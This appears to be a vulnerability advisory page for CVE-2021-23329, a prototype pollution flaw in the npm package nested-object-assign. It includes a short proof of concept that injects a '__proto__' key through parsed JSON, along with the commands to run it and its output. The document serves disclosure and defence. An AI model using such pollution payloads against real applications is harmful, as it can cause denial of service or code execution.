Lucene search
Arjunshibu1-NPM-NESTED-OBJECT-ASSIGNHistoryJan 28, 2021 - 12:00 a.m.
Prototype Pollution in geta/nestedobjectassign
2021-01-2800:00:00
arjunshibu
www.huntr.dev
9
nested-object-assign
prototype pollution
vulnerability
information disclosure
dos
rce
npm package
EPSS
0.001
Percentile
41.8%
Description
nested-object-assign is vulnerable to Prototype Pollution.
Proof of Concept
- Create the following PoC file:
// poc.js
const assign = require('nested-object-assign')
console.log('Before: ' + {}.polluted)
assign({}, JSON.parse('{"__proto__": {"polluted": true}}'))
console.log('After: ' + {}.polluted)
- Execute the following commands in the terminal:
npm i nested-object-assign # install vulnerable package
node poc.js # run the PoC
- Check the output:
Before: undefined
After: true
Impact
Prototype Pollution leads to Information Disclosure/DoS/RCE.
Related
cve
cve
CVE-2021-23329
2021-01-31 16:15:12
nvd
nvd
CVE-2021-23329
2021-01-31 16:15:12
cvelist
cvelist
CVE-2021-23329 Prototype Pollution
2021-01-31 15:25:14
osv
osv
CVE-2021-23329
2021-01-31 16:15:12
Prototype pollution in nested-object-assign
2021-02-01 15:01:14
prion
prion
Default credentials
2021-01-31 16:15:00
github
github
Prototype pollution in nested-object-assign
2021-02-01 15:01:14
veracode
veracode
Prototype Pollution
2021-02-01 02:09:21